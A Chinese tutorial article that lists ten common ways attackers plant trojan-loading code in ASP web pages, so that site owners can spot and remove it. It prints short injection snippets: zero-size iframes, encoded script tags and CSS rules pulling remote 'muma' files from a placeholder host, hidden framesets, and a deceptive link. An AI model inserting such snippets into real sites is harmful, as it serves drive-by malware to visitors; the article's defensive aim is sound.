- ·上一篇文章:SQL Server返回最后插入记录的自动编号ID值
- ·下一篇文章:asp的utf-8编码转换成gb2312编码的函数
Asp页面上十大挂马方式总结与解决方法
这篇文章指在告诉大家黑客经常在网页挂马方式,从而可以对自己的asp网页进行防范,只要检测这些经常被用于挂马的地方,很容易找到木马的所在。
一:框架挂马
<
iframe src=地址 width=0 height=0>
<
/iframe>
其中“地址”处可以输入恶意网站链接等
二:js文件挂马
只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等。
三:js变形加密
<
SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt>
<
/script>
muma.txt可改成任意后缀
四:body挂马
<
body >
<
/body>
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<
iframe src="http://www.xxx.com/muma.htm/">
<
/iframe>
'
六:css中挂马
body
{
background-image: url('javascript:document.write("<
script src=http://www.XXX.net/muma.js>
<
/script>
")')}
这种方式比较狠,也比较难发现。
七:JAJA挂马
<
SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1")
<
/script>
八:图片伪装
<
html>
<
iframe src="网马地址" height=0 width=0>
<
/iframe>
<
img src="图片地址">
<
/center>
<
/html>
九:伪装调用
<
frameset rows="444,0" cols="*">
<
frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<
frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
<
/frameset>
十:高级欺骗
<
a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" >
页面要显示的内容 <
/a>
<
SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址"
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10")
}
<
/SCRIPT>
如何发现多个页面上都有上面的代码出现在页面上,那么就需要批量替换工具,将这些代码替换掉,这不是根本的解决方法。根本的解决方法是:找出网站的漏洞,把堵起来,下次就不会出现自己asp页面被别人加上这些代码了。
Asp页面上十大挂马方式总结与解决方法